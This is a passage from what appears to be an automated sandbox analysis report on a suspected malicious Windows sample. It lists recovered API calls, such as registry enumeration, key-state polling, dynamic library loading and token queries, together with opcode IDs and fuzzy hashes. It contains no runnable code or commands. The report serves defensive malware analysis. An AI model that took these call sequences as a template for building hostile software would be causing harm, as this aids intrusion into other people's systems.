                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ErrorMode$InformationVolume__swprintf
                                        • String ID: %lu
                                        • API String ID: 3164766367-685833217
                                        • Opcode ID: b2f8853c9230a2758a85047fe091f114124d5a83754b7522ce8bca91754ae38e
                                        • Instruction ID: c3fb27b88f8b41c5225471ff0ca75939c1a5fd4ccb51396a7169a59681b0ffa2
                                        • Opcode Fuzzy Hash: b2f8853c9230a2758a85047fe091f114124d5a83754b7522ce8bca91754ae38e
                                        • Instruction Fuzzy Hash: 12216230A0010DAFCB10EB65CC85DAE77F8EF89704B0440A9F509AB252DB71EA45DB61
                                        APIs
                                          • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                                          • Part of subcall function 00EDA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00EDA399
                                          • Part of subcall function 00EDA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EDA3AC
                                          • Part of subcall function 00EDA37C: GetCurrentThreadId.KERNEL32 ref: 00EDA3B3
                                          • Part of subcall function 00EDA37C: AttachThreadInput.USER32(00000000), ref: 00EDA3BA
                                        • GetFocus.USER32 ref: 00EDA554
                                          • Part of subcall function 00EDA3C5: GetParent.USER32(?), ref: 00EDA3D3
                                        • GetClassNameW.USER32(?,?,00000100), ref: 00EDA59D
                                        • EnumChildWindows.USER32(?,00EDA615), ref: 00EDA5C5
                                        • __swprintf.LIBCMT ref: 00EDA5DF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                        • String ID: %s%d
                                        • API String ID: 1941087503-1110647743
                                        • Opcode ID: 09775ab6a7c2f2450aa1c009e08907eaaf9928e9735de5fe198bb664878daa0f
                                        • Instruction ID: 133408428f01606c98dfa09103af3870ba72b2829ec405158b394087af317661
                                        • Opcode Fuzzy Hash: 09775ab6a7c2f2450aa1c009e08907eaaf9928e9735de5fe198bb664878daa0f
                                        • Instruction Fuzzy Hash: A611A871500208BBDF107F64DC85FEE37B9EF49700F045076B91C7A192CA759A469B75
                                        APIs
                                        • CharUpperBuffW.USER32(?,?), ref: 00EE2048
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: BuffCharUpper
                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                        • API String ID: 3964851224-769500911
                                        • Opcode ID: eb0d7744fba96e32a6272baee74c5b5306c360d87e6862e4b2dc14e40682ed81
                                        • Instruction ID: 77b9634dc3a599a4dd8d3fe8ed5ca6c7ecf31cb953dd0d7d47b583d626b8445f
                                        • Opcode Fuzzy Hash: eb0d7744fba96e32a6272baee74c5b5306c360d87e6862e4b2dc14e40682ed81
                                        • Instruction Fuzzy Hash: D9115B7190010D8FCF10EFA5D8914EEB7F4FF5A304F1094A9D995BB292EB32A90ADB50
                                        APIs
                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00EFEF1B
                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00EFEF4B
                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00EFF07E
                                        • CloseHandle.KERNEL32(?), ref: 00EFF0FF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                        • String ID:
                                        • API String ID: 2364364464-0
                                        • Opcode ID: 70d02ddac4b8a1df15d9014af5403874ceb75d6bc4b29aadbd5f7fae07b47dd7
                                        • Instruction ID: ebaeab9b44e2961e80318113dcfd8af52e47371c292b078884194fc78701563f
                                        • Opcode Fuzzy Hash: 70d02ddac4b8a1df15d9014af5403874ceb75d6bc4b29aadbd5f7fae07b47dd7
                                        • Instruction Fuzzy Hash: 7F815271A043019FD724EF24CC86B7AB7E5AF88710F54981DF99EE7292DB70AC418B51
                                        APIs
                                          • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                                          • Part of subcall function 00F010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F00038,?,?), ref: 00F010BC
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F00388
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F003C7
                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F0040E
                                        • RegCloseKey.ADVAPI32(?,?), ref: 00F0043A
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F00447
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                        • String ID:
                                        • API String ID: 3440857362-0
                                        • Opcode ID: 79b86a17178915ca99edcf1fa31f1f5724cdca50c54d404508c370b8e5e2d4e7
                                        • Instruction ID: db42fe1e50867a36d1d2918625fbe5f271b727f366d803d90b3d7470b575c10c
                                        • Opcode Fuzzy Hash: 79b86a17178915ca99edcf1fa31f1f5724cdca50c54d404508c370b8e5e2d4e7
                                        • Instruction Fuzzy Hash: 04515931608204AFD714EB64CC81F6AB7E8FF84714F04892EF59997292DB31E905EB52
                                        APIs
                                          • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                                          • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                                        • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00EFDC3B
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00EFDCBE
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00EFDCDA
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00EFDD1B
                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00EFDD35
                                          • Part of subcall function 00E85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00EE7B20,?,?,00000000), ref: 00E85B8C
                                          • Part of subcall function 00E85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00EE7B20,?,?,00000000,?,?), ref: 00E85BB0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                        • String ID:
                                        • API String ID: 327935632-0
                                        • Opcode ID: a5e1fd6d5c6cb9ba15c25c226607aa216e21d81095b809d687397754e6ee5b9b
                                        • Instruction ID: cdfa1ede65c6af051dba894e73189fe9d8be354e1c22a6218a72f8fe4e394b8c
                                        • Opcode Fuzzy Hash: a5e1fd6d5c6cb9ba15c25c226607aa216e21d81095b809d687397754e6ee5b9b
                                        • Instruction Fuzzy Hash: E0513735A04209DFCB00EF68C8849ADFBF5FF59314B0991A9E919AB312DB31ED45CB91
                                        APIs
                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00EEE88A
                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00EEE8B3
                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00EEE8F2
                                          • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                                          • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00EEE917
                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00EEE91F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                        • String ID:
                                        • API String ID: 1389676194-0
                                        • Opcode ID: 1db55b195087f9707bd7d7b8469e731c722543e332d8016897ba243f58f69abd
                                        • Instruction ID: 58110e6377c354a6ea7e8f570cf878371f3b0ded508085281421e0d3fcbf09eb
                                        • Opcode Fuzzy Hash: 1db55b195087f9707bd7d7b8469e731c722543e332d8016897ba243f58f69abd
                                        • Instruction Fuzzy Hash: E251F935A00209DFCB15EF65C9819AEBBF5EF49314B189099E849BB362CB31ED11DB50
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bf9ff502378c3cbe8e94ba04e8a6364c8fd30db41d1d28ab5bed42946e926c06
                                        • Instruction ID: 0ab2bc54c0819d92d495cc0d06c95e17a474a9bb4b16e956708b4ddae732697f
                                        • Opcode Fuzzy Hash: bf9ff502378c3cbe8e94ba04e8a6364c8fd30db41d1d28ab5bed42946e926c06
                                        • Instruction Fuzzy Hash: 7141DF39D00308AFD720DB28CC48FA9BBA9FB09320F154265F855E72E1D771AD41FA52
                                        APIs
                                        • GetCursorPos.USER32(?), ref: 00E82357
                                        • ScreenToClient.USER32(00F467B0,?), ref: 00E82374
                                        • GetAsyncKeyState.USER32(00000001), ref: 00E82399
                                        • GetAsyncKeyState.USER32(00000002), ref: 00E823A7
                                        Similarity
                                        • API ID: AsyncState$ClientCursorScreen
                                        • String ID:
                                        • API String ID: 4210589936-0
                                        • Opcode ID: 09726d4c88a30f8f80a9d2f5d598a1ea4f5d2df4e206b1d170c29d788231d236
                                        • Instruction ID: 4390626a800e17e73e4541dfc1aed5ab5ab3f2213b4aac7b7e0e8ed9409accc9
                                        • Opcode Fuzzy Hash: 09726d4c88a30f8f80a9d2f5d598a1ea4f5d2df4e206b1d170c29d788231d236
                                        • Instruction Fuzzy Hash: E341813550851AFBDF159FA8CC44AEABB74FB05324F20431AF92CA22A0C7355954EB91
                                        APIs
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ED695D
                                        • TranslateAcceleratorW.USER32(?,?,?), ref: 00ED69A9
                                        • TranslateMessage.USER32(?), ref: 00ED69D2
                                        • DispatchMessageW.USER32(?), ref: 00ED69DC
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ED69EB
                                        Similarity
                                        • API ID: Message$PeekTranslate$AcceleratorDispatch
                                        • String ID:
                                        • API String ID: 2108273632-0
                                        • Opcode ID: 7e4ade35855574da39bb234d790940d2f1c7102d4d34d61f7752aa7a839d7dfd
                                        • Instruction ID: dc1cbcda97e51cf8ddf16e9405a11e67b8895535ff01075779f16adcf92174e4
                                        • Opcode Fuzzy Hash: 7e4ade35855574da39bb234d790940d2f1c7102d4d34d61f7752aa7a839d7dfd
                                        • Instruction Fuzzy Hash: B931E57150024AAEDB20CF74CC84BF67BA8EB13318F105167E825E22A1D775988BE791
                                        APIs
                                        • GetWindowRect.USER32(?,?), ref: 00ED8F12
                                        • PostMessageW.USER32(?,00000201,00000001), ref: 00ED8FBC
                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00ED8FC4
                                        • PostMessageW.USER32(?,00000202,00000000), ref: 00ED8FD2
                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00ED8FDA
                                        Similarity
                                        • API ID: MessagePostSleep$RectWindow
                                        • String ID:
                                        • API String ID: 3382505437-0
                                        • Opcode ID: 9dc4488e5f9667297f5a665f6a9c5d75b766a961a4180def9889927aec37158a
                                        • Instruction ID: 335f6ba12df353ac23dce7168f7a261098b1a58f6b98aab3d3d799a1112c6bd7
                                        • Opcode Fuzzy Hash: 9dc4488e5f9667297f5a665f6a9c5d75b766a961a4180def9889927aec37158a
                                        • Instruction Fuzzy Hash: 3031C07160021DEFDB14CF68DE4CA9E7BB6FB04315F10422AF925E62D0C7B09915DB90
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 00EDB6C7
                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00EDB6E4
                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00EDB71C
                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00EDB742
                                        • _wcsstr.LIBCMT ref: 00EDB74C
                                        Similarity
                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                        • String ID:
                                        • API String ID: 3902887630-0
                                        • Opcode ID: 94bb02bea81c74c5af88c287b8aa7e49d3984ddb47ed1e035acd250e75565949
                                        • Instruction ID: b91b3a98a8b55abd6a8b405a5cf0e907f2e2bb2d274b7d07a0fb2b775d1bf655
                                        • Opcode Fuzzy Hash: 94bb02bea81c74c5af88c287b8aa7e49d3984ddb47ed1e035acd250e75565949
                                        • Instruction Fuzzy Hash: FE21D731204204FBEB255B399C49E7B7B9CEF4A760F01516BF805EA2A1FB61DC429660
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F0B44C
                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00F0B471
                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00F0B489
                                        • GetSystemMetrics.USER32(00000004), ref: 00F0B4B2
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00EF1184,00000000), ref: 00F0B4D0
                                        Similarity
                                        • API ID: Window$Long$MetricsSystem
                                        • String ID:
                                        • API String ID: 2294984445-0
                                        • Opcode ID: a6ce8afc5c03cfe0f99b0506baeb19ed1665b3c295105fbec83bd081e2070333
                                        • Instruction ID: 7f573414b167fdfe88117bb64a049d7fb903633b63355555143abc9f94663d74
                                        • Opcode Fuzzy Hash: a6ce8afc5c03cfe0f99b0506baeb19ed1665b3c295105fbec83bd081e2070333
                                        • Instruction Fuzzy Hash: 34215C75910265AFCB20DF388C48A6A3BA4FB05730B154629FD26D66E2E7309A50FB90
                                        APIs
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00ED9802
                                          • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00ED9834
                                        • __itow.LIBCMT ref: 00ED984C
                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00ED9874
                                        • __itow.LIBCMT ref: 00ED9885
                                        Similarity
                                        • API ID: MessageSend$__itow$_memmove
                                        • String ID:
                                        • API String ID: 2983881199-0
                                        • Opcode ID: 7fc0a3f31f07f1f9edef986280adb6c7eda5d1cd8cc4c1652905887e9bcabb86
                                        • Instruction ID: 74e44f9187f45adb53c8bc92daba6bace42bbcf410938b0e69c4439aac26b01a
                                        • Opcode Fuzzy Hash: 7fc0a3f31f07f1f9edef986280adb6c7eda5d1cd8cc4c1652905887e9bcabb86
                                        • Instruction Fuzzy Hash: F3210035B002046FDB14AA718C86EEE7BE8EF4AB14F041026FD05FB341D670DD46A791
                                        APIs
                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E8134D
                                        • SelectObject.GDI32(?,00000000), ref: 00E8135C
                                        • BeginPath.GDI32(?), ref: 00E81373
                                        • SelectObject.GDI32(?,00000000), ref: 00E8139C
                                        Similarity
                                        • API ID: ObjectSelect$BeginCreatePath
                                        • String ID:
                                        • API String ID: 3225163088-0
                                        • Opcode ID: 3b7d0eead5154bd0f8e10553b9baddcb3f07c3da8cf5c7459d3ceafb4e00ab7c
                                        • Instruction ID: f769fbba0092325fe082c005ad41211150c705c7230d746b563b507d12ff8f18
                                        • Opcode Fuzzy Hash: 3b7d0eead5154bd0f8e10553b9baddcb3f07c3da8cf5c7459d3ceafb4e00ab7c
                                        • Instruction Fuzzy Hash: 4C215E7480030CEBDB11AF25DC047A97BB9FB22326F148266F818E65A0D3719896EB91
                                        APIs
                                        Similarity
                                        • API ID: _memcmp
                                        • String ID:
                                        • API String ID: 2931989736-0
                                        • Opcode ID: 99ec14ffbb27ec9ac93eb63ff421c65563115439c0bdfb94ec848b368d9c2bef
                                        • Instruction ID: c4e513e58648d3b9e232724f97b89aa81f60b3f0c6e4f87b85add8f0cb993994
                                        • Opcode Fuzzy Hash: 99ec14ffbb27ec9ac93eb63ff421c65563115439c0bdfb94ec848b368d9c2bef
                                        • Instruction Fuzzy Hash: 0B0196716052277BD204A6215C42EEF77ACDF563E8F145152FD04FA343E661EE12D2E1
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 00EE4D5C
                                        • __beginthreadex.LIBCMT ref: 00EE4D7A
                                        • MessageBoxW.USER32(?,?,?,?), ref: 00EE4D8F
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00EE4DA5
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00EE4DAC
                                        Similarity
                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                        • String ID:
                                        • API String ID: 3824534824-0
                                        • Opcode ID: 6e8ddf202f549aa83052be5e3abcfd7bfa8c7c19c81ee1dc33026b9404796ae5
                                        • Instruction ID: 61a0fa92f1b38d6c6f399c4d7999f1df9220a80b0f0d4771434a95dc64493ae9
                                        • Opcode Fuzzy Hash: 6e8ddf202f549aa83052be5e3abcfd7bfa8c7c19c81ee1dc33026b9404796ae5
                                        • Instruction Fuzzy Hash: 0C1104B690424CBBCB119FA99C08ADA7FACEB9A324F144265FD14E3290D6B18D4497A1
                                        APIs
                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00ED8766
                                        • GetLastError.KERNEL32(?,00ED822A,?,?,?), ref: 00ED8770
                                        • GetProcessHeap.KERNEL32(00000008,?,?,00ED822A,?,?,?), ref: 00ED877F
                                        • RtlAllocateHeap.NTDLL(00000000,?,00ED822A), ref: 00ED8786
                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00ED879D
                                        Similarity
                                        • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                        • String ID:
                                        • API String ID: 883493501-0
                                        • Opcode ID: a6a49fcb64cd96148f59b1a83ddc00f7e30c36b7c71ba9f77538a0df0e76317b
                                        • Instruction ID: 6c657d0ba45e4199025d7c4894d34a3c17918cbfb37a79da293a36b2b7c02953
                                        • Opcode Fuzzy Hash: a6a49fcb64cd96148f59b1a83ddc00f7e30c36b7c71ba9f77538a0df0e76317b
                                        • Instruction Fuzzy Hash: 0E016D71600208FFDB204FA6DD88D6B7BACFF89359720043AF849D2260DA329C05DA60
                                        APIs
                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EE5502
                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00EE5510
                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EE5518
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00EE5522
                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EE555E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                        • String ID:
                                        • API String ID: 2833360925-0
                                        • Opcode ID: a12e5fff57db7d0a98e554664237172679025bfaf1ca8fd666802f6a9011763c
                                        • Instruction ID: 5e8dbebc6019772709c5bd966824ea2b084f61d1d0f4ab765fddd664a438b346
                                        • Opcode Fuzzy Hash: a12e5fff57db7d0a98e554664237172679025bfaf1ca8fd666802f6a9011763c
                                        • Instruction Fuzzy Hash: BF012D36D00A5DDBCF10DFE9E8885EDBB79FB09715F401056E901B2540DB709558D7A1
                                        APIs
                                        • CLSIDFromProgID.COMBASE ref: 00ED766F
                                        • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00ED768A
                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00ED758C,80070057,?,?), ref: 00ED7698
                                        • CoTaskMemFree.COMBASE(00000000), ref: 00ED76A8
                                        • CLSIDFromString.COMBASE(?,?), ref: 00ED76B4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                        • String ID:
                                        • API String ID: 3897988419-0
                                        • Opcode ID: b7113607a85b908b49100a38bde38b8c58630ba456312d1819ad3958a27a3451
                                        • Instruction ID: be353b0d9d89a73b3229d0fc7e474671e13b955b2aed9cb9212bc55c57207303
                                        • Opcode Fuzzy Hash: b7113607a85b908b49100a38bde38b8c58630ba456312d1819ad3958a27a3451
                                        • Instruction Fuzzy Hash: FE0171B2605608ABDB209F58DD44AAA7FEDEB44751F14402AFD44E2211F731DD4597A0
                                        APIs
                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00ED8608
                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00ED8612
                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00ED8621
                                        • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00ED8628
                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00ED863E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
